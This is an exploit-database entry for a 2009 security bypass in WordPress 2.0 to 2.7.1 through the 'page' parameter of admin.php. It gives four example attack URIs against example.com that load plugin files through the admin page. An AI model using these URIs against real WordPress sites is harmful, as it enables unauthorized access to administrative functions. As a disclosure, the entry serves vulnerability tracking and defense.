WordPress Core 2.0 < 2.7.1 - 'admin.php' Module Configuration Security Bypass
| EKU-ID: 17748 | CVE: | OSVDB-ID: |
| Author: Fernando Arnaboldi | Published: 2009-11-10 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 17748 | CVE: | OSVDB-ID: |
| Author: Fernando Arnaboldi | Published: 2009-11-10 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
An attacker can exploit this issue via a browser. The following example URIs are available: http://www.example.com/wp-admin/admin.php?page=/collapsing-archives/options.txt http://www.example.com/wp-admin/admin.php?page=akismet/readme.txt http://www.example.com/wp-admin/admin.php?page=related-ways-to-take-action/options.php http://www.example.com/wp-admin/admin.php?page=wp-security-scan/securityscan.php